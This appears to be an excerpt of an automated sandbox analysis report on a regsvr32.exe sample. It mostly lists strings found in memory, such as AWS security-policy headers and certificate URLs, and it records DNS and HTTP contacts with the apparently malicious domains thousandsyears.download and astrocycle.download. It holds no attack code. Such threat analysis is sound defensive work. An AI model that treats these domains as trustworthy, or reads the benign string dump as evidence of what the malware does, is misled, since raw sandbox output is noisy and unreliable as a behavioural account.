https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: ntent-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: ntent-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: unknownDNS traffic detected: queries for: thousandsyears.download
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Jul 2021 14:03:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=c9m9rUyBRXM1jwbZnQnjrdkcxrPLNKC33w7AQ0XAQre54ieS8G0YxkLLsb6qhBGQAR8g40dUX3LfP44TOwFsAmBmZl7LDWuENpEDOUNNRrD%2Fc6PWZud4EH25iI48xq4vIg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a960506f5bc2f4-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
        Source: regsvr32.exe, 00000004.00000002.2088517026.000000000023E000.00000004.00000020.sdmpString found in binary or memory: http://astrocycle.download/
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://crl.roo
        Source: regsvr32.exe, 00000004.00000002.2088460611.00000000001B0000.00000004.00000001.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: regsvr32.exe, 00000004.00000002.2088460611.00000000001B0000.00000004.00000001.sdmpString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
        Source: regsvr32.exe, 00000004.00000002.2088460611.00000000001B0000.00000004.00000001.sdmpString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
        Source: regsvr32.exe, 00000004.00000002.2088460611.00000000001B0000.00000004.00000001.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: regsvr32.exe, 00000004.00000002.2088460611.00000000001B0000.00000004.00000001.sdmpString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
        Source: regsvr32.exe, 00000004.00000002.2088460611.00000000001B0000.00000004.00000001.sdmpString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
        Source: regsvr32.exe, 00000004.00000002.2091204601.00000000030B0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
        Source: regsvr32.exe, 00000004.00000002.2091204601.00000000030B0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
        Source: regsvr32.exe, 00000004.00000002.2092214818.0000000003297000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
        Source: regsvr32.exe, 00000004.00000002.2092214818.0000000003297000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
        Source: regsvr32.exe, 00000004.00000002.2088460611.00000000001B0000.00000004.00000001.sdmpString found in binary or memory: http://o.ss2.us/0
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
        Source: regsvr32.exe, 00000004.00000002.2088460611.00000000001B0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: regsvr32.exe, 00000004.00000002.2088460611.00000000001B0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.sca1b.amazontrust.com
        Source: regsvr32.exe, 00000004.00000002.2088460611.00000000001B0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.sca1b.amazontrust.comca1b.crt0
        Source: regsvr32.exe, 00000004.00000002.2088460611.00000000001B0000.00000004.00000001.sdmpString found in binary or memory: http://s.ss2.us/r.crl0
        Source: regsvr32.exe, 00000004.00000002.2089851397.0000000002CC0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: regsvr32.exe, 00000003.00000002.2081253641.0000000001C90000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2088733312.0000000001C90000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2089402816.0000000001E00000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
        Source: regsvr32.exe, 00000004.00000002.2092214818.0000000003297000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
        Source: regsvr32.exe, 00000004.00000002.2092214818.0000000003297000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: regsvr32.exe, 00000004.00000002.2089851397.0000000002CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
        Source: regsvr32.exe, 00000004.00000002.2091204601.00000000030B0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
        Source: regsvr32.exe, 00000004.00000002.2092214818.0000000003297000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
        Source: regsvr32.exe, 00000004.00000002.2091204601.00000000030B0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
        Source: regsvr32.exe, 00000004.00000002.2091204601.00000000030B0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
        Source: regsvr32.exe, 00000004.00000002.2088460611.00000000001B0000.00000004.00000001.sdmpString found in binary or memory: http://x.ss2.us/x.cer0&
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://112-tzm-766.mktoresp.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://112-tzm-766.mktoutil.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.47/js
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.76
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/directories
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-cardsui
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-head.js
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/librastandardlib
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.112/plc
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/psf/null
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://a0.awsstatic.com;
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://a0.p.awsstatic.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://a1.awsstatic.com
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: https://amazon.com/
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservices.d2.sc.omtrdc.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://anchor.fm
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://api.regional-table.region-services.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://api.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://aws-quickstart.s3.amazonaws.com
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmpString found in binary or memory: https://aws.amazon.com/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/?nc2=h_lg
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/
        Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmpString found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
